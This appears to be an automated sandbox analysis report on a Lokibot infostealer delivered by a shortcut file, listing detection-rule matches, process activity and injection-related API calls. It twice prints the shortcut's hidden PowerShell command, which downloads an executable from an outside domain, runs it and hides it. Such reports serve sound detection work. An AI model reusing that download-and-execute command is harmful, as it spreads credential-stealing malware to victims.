                Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: screens.pif PID: 2208, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: screens.pif PID: 688, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: screens.pif.0.drStatic PE information: section name: j1CM!e^U
                Source: screens.pif.0.drStatic PE information: section name:
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\screens.pifJump to dropped file
                Source: Comprobante.lnk.lnkLNK file: -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABEDBB0 NtResumeThread,4_2_0ABEDBB0
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABED9F8 NtReadVirtualMemory,4_2_0ABED9F8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABEDF28 NtSetContextThread,4_2_0ABEDF28
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABEDDD0 NtWriteVirtualMemory,4_2_0ABEDDD0
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABEDBA8 NtResumeThread,4_2_0ABEDBA8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABED9F0 NtReadVirtualMemory,4_2_0ABED9F0
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABEDF21 NtSetContextThread,4_2_0ABEDF21
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABEDDC9 NtWriteVirtualMemory,4_2_0ABEDDC9
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D546C04_2_02D546C0
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D537604_2_02D53760
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D56F284_2_02D56F28
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D524D84_2_02D524D8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D508E14_2_02D508E1
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D5D0384_2_02D5D038
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D5B5B84_2_02D5B5B8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D5B9784_2_02D5B978
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D52D204_2_02D52D20
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D56A904_2_02D56A90
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D56A804_2_02D56A80
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D5A6684_2_02D5A668
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D562184_2_02D56218
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D518CF4_2_02D518CF
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D564F14_2_02D564F1
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D568704_2_02D56870
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D568634_2_02D56863
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D524394_2_02D52439
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D545C04_2_02D545C0
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D579C24_2_02D579C2
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D531E84_2_02D531E8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D5459F4_2_02D5459F
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D56D584_2_02D56D58
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_02D56D484_2_02D56D48
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE0B884_2_0ABE0B88
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABEE08F4_2_0ABEE08F
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE26374_2_0ABE2637
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABECDC04_2_0ABECDC0
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE0B784_2_0ABE0B78
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE00064_2_0ABE0006
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE00404_2_0ABE0040
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE1FB84_2_0ABE1FB8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE1FC84_2_0ABE1FC8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABEBC274_2_0ABEBC27
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABE85204_2_0ABE8520
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0ABECD1C4_2_0ABECD1C
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0AEA00404_2_0AEA0040
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0AEA00254_2_0AEA0025
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0679184_2_0D067918
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0655284_2_0D065528
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0670884_2_0D067088
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0683934_2_0D068393
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0692E04_2_0D0692E0
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D060F084_2_0D060F08
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0619C84_2_0D0619C8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0619D84_2_0D0619D8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D06B8B84_2_0D06B8B8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0617784_2_0D061778
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D06B6204_2_0D06B620
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0616E84_2_0D0616E8
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0611F34_2_0D0611F3
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D06704A4_2_0D06704A
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0603104_2_0D060310
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0603204_2_0D060320
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0673584_2_0D067358
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D06A2184_2_0D06A218
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D06F2184_2_0D06F218
                Source: C:\Users\user\Desktop\screens.pifCode function: 4_2_0D0692BA4_2_0D0692BA
                Source: C:\Users\user\Desktop\screens.pifCode function: 5_2_0040549C5_2_0040549C
                Source: C:\Users\user\Desktop\screens.pifCode function: 5_2_004029D45_2_004029D4
                Source: C:\Users\user\Desktop\screens.pifCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\screens.pifCode function: String function: 00405B6F appears 42 times
                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 80
                Source: screens.pif.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 4.2.screens.pif.49889b8.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 4.2.screens.pif.49889b8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.screens.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.screens.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: screens.pif PID: 2208, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: screens.pif PID: 688, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: screens.pif.0.drStatic PE information: Section: j1CM!e^U ZLIB complexity 1.0003301933811801
                Source: classification engineClassification label: mal100.troj.spyw.evad.winLNK@12/12@3/2
                Source: C:\Users\user\Desktop\screens.pifCode function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,5_2_0040650A
                Source: C:\Users\user\Desktop\screens.pifCode function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,5_2_0040434D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\screens.pifJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Users\user\Desktop\screens.pifMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6092
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5852
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmzi4otn.c2j.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: Comprobante.lnk.lnkReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\screens.pif "C:\Users\user\Desktop\screens.pif"
                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif
                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif
                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Users\user\Desktop\screens.pif C:\Users\user\Desktop\screens.pif
                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 80
                Source: C:\Users\user\Desktop\screens.pifProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 80
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\screens.pif "C:\Users\user\Desktop\screens.pif" Jump to behavior
